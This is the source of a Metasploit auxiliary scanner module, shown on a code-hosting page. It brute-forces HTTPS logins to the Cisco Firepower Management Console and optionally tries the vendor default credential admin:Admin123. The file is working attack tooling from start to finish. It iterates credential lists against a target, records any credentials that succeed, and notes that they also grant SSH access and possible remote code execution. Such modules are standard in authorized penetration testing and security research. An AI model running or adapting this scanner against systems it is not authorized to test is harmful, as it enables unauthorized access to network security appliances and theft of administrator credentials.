Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/cisco_firepower_login.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/login_scanner/cisco_firepower'

7
require 'metasploit/framework/credential_collection'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::AuthBrute

12
  include Msf::Auxiliary::Report

13
  include Msf::Auxiliary::Scanner

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Cisco Firepower Management Console 6.0 Login',

20
        'Description' => %q{

21
          This module attempts to authenticate to a Cisco Firepower Management console via HTTPS.

22
          The credentials are also used for SSH, which could allow remote code execution.

23
        },

24
        'Author' => [ 'sinn3r' ],

25
        'License' => MSF_LICENSE,

26
        'DefaultOptions' => {

27
          'RPORT' => 443,

28
          'SSL' => true,

29
          'SSLVersion' => 'Auto'

30
        },

31
        'Notes' => {

32
          'Reliability' => UNKNOWN_RELIABILITY,

33
          'Stability' => UNKNOWN_STABILITY,

34
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

35
        }

36
      )

37
    )

38


39
    register_options(

40
      [

41
        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),

42
        OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:Admin123', false])

43
      ]

44
    )

45
  end

46


47
  def scanner(ip)

48
    @scanner ||= lambda {

49
      cred_collection = build_credential_collection(

50
        username: datastore['USERNAME'],

51
        password: datastore['PASSWORD']

52
      )

53


54
      if datastore['TRYDEFAULT']

55
        print_status("Default credential admin:Admin123 added to the credential queue for testing.")

56
        cred_collection.add_public('admin')

57
        cred_collection.add_private('Admin123')

58
      end

59


60
      return Metasploit::Framework::LoginScanner::CiscoFirepower.new(

61
        configure_http_login_scanner(

62
          host: ip,

63
          port: datastore['RPORT'],

64
          cred_details: cred_collection,

65
          stop_on_success: datastore['STOP_ON_SUCCESS'],

66
          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

67
          connection_timeout: 5,

68
          http_username: datastore['HttpUsername'],

69
          http_password: datastore['HttpPassword'],

70
          uri: target_uri.path

71
        )

72
      )

73
    }.call

74
  end

75


76
  def report_good_cred(ip, port, result)

77
    service_data = {

78
      address: ip,

79
      port: port,

80
      service_name: 'http',

81
      protocol: 'tcp',

82
      workspace_id: myworkspace_id

83
    }

84


85
    credential_data = {

86
      module_fullname: self.fullname,

87
      origin_type: :service,

88
      private_data: result.credential.private,

89
      private_type: :password,

90
      username: result.credential.public,

91
    }.merge(service_data)

92


93
    login_data = {

94
      core: create_credential(credential_data),

95
      last_attempted_at: DateTime.now,

96
      status: result.status,

97
      proof: result.proof

98
    }.merge(service_data)

99


100
    create_credential_login(login_data)

101
  end

102


103
  def report_bad_cred(ip, rport, result)

104
    invalidate_login(

105
      address: ip,

106
      port: rport,

107
      protocol: 'tcp',

108
      public: result.credential.public,

109
      private: result.credential.private,

110
      realm_key: result.credential.realm_key,

111
      realm_value: result.credential.realm,

112
      status: result.status,

113
      proof: result.proof

114
    )

115
  end

116


117
  def bruteforce(ip)

118
    scanner(ip).scan! do |result|

119
      case result.status

120
      when Metasploit::Model::Login::Status::SUCCESSFUL

121
        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")

122
        report_good_cred(ip, rport, result)

123
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT

124
        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)

125
        report_bad_cred(ip, rport, result)

126
      when Metasploit::Model::Login::Status::INCORRECT

127
        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")

128
        report_bad_cred(ip, rport, result)

129
      end

130
    end

131
  end

132


133
  def run_host(ip)

134
    unless scanner(ip).check_setup

135
      print_brute(:level => :error, :ip => ip, :msg => 'Target is not Cisco Firepower Management console.')

136
      return

137
    end

138


139
    bruteforce(ip)

140
  end

141
end

142


143